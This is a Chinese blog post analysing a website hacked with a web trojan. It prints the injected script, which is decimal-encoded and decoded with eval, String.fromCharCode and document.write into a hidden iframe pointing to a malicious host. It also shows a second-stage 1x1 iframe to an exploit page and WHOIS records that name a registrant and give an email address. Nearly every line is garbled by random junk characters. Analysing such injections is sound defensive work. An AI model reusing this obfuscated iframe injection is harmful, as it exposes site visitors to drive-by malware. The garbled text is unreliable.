首发在我的博客里面,
%5uuB4P&|$ m(&ZNZK http://www.areway.cn/?p=175 rb9x|| txliZ|.O TpnkJygIm 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
&\5T`|~)! =JEnK_@?K\ <script>t=’60,105,102,114,97,109,101,
6 C 32,115,114,99,61,104,116,116,112,58,47,47,
3L#KHTM 102,114,101,101,46,117,45,117,117,117,46,99,
RJGf@am& 110,47,101,114,114,111,114,46,104,116,109,
9m8`4%y= 32,119,105,100,116,104,61,49,48,48,32,104,
kH{axMNc 101,105,103,104,116,61,48,62,60,47,105,102,
8XTVpf4 114,97,109,101,62′;
BV7GzJ2([{ t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
}-Zfljj ;}:"[B3$ <script>t=’60,105,102,114,97,109,101,32,115,
EI+.Q 114,99,61,104,116,116,112,58,47,47,102,114,
(?~F}u
v 101,101,46,117,45,117,117,117,46,99,110,47,
cU*7E39 101,114,114,111,114,46,104,116,109,32,119,
*BSL=8G{ 105,100,116,104,61,49,48,48,32,104,101,105,
Kr8p:$D}; 103,104,116,61,48,62,60,47,105,102,114,97,
%Uuhi&PA-l 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
=:#$_qR document.write(t);</script>
B_:K.]DK` VCh%v -/ <html xmlns=”
Amz7j8zJ http://www.w3.org/1999/xhtml {U&Mo97rzX “>
S6Kaw <head>
.*v8*8OJ& <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
%(n4`@ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
c?[A <title>首页 - 爱生活家庭网
koaH31Q ZfMJU 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
XD*$$`+# 转换字符串后的大概内容是(谁点击后果自付):
B9+oI cO <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
Z\NC+{7k] <m9IZIY< 查询玉米u-uuu.cn的详细信息:
PN<Y&/fB
Domain Name: u-uuu.cn
o%CBSm] ROID: 20070901s10001s64972306-cn
4(o0I~hpB? Domain Status: ok
Vrz<DB^-e Registrant Organization: 王雷
#E*jX-JT Registrant Name: 王雷
EV]exYWB Administrative Email:
czlovexs@126.com >6(nW:I0y Sponsoring Registrar: 北京万网志成科技有限公司
`yc.A%5 Name Server:ns.yovole.com
9t;aJFI Name Server:ns1.yovole.com
rMLCtGi Registration Date: 2007-09-01 17:54
CK.Z-_M Expiration Date: 2008-09-01 17:54
K\o! 最后PING了一下地址 都没有什么….
hcM 0?= oz@yF)/Sm 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
lOYwYMi <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
dpTap<Noby <script language=”javascript” src=”
I'J=I{p* http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script 9;q@;)'5 >
~!Onz wmO 这个玉米应该有可能是木马作者的:
^${-^w@,%V foafau.info的详细信息:
c~dX8+ Access to INFO WHOIS information is provided to assist persons in
ptrLnJ|% determining the contents of a domain name registration record in the
<y~`J`- Afilias registry database. The data in this record is provided by
Lt=#tu&d Afilias Limited for informational purposes only, and Afilias does not
AvhmN5O= guarantee its accuracy. This service is intended only for query-based
u},<On access. You agree that you will use this data only for lawful purposes
UPLr[>Q# and that, under no circumstances will you use this data to: (a) allow,
wgI$'tI enable, or otherwise support the transmission by e-mail, telephone, or
2D&tDX< facsimile of mass unsolicited, commercial advertising or solicitations
KWU#Swa` to entities other than the data recipient’s own existing customers; or
6\'v_A
O (b) enable high volume, automated, electronic processes that send
5P+3D{ queries or data to the systems of Registry Operator, a Registrar, or
V .$<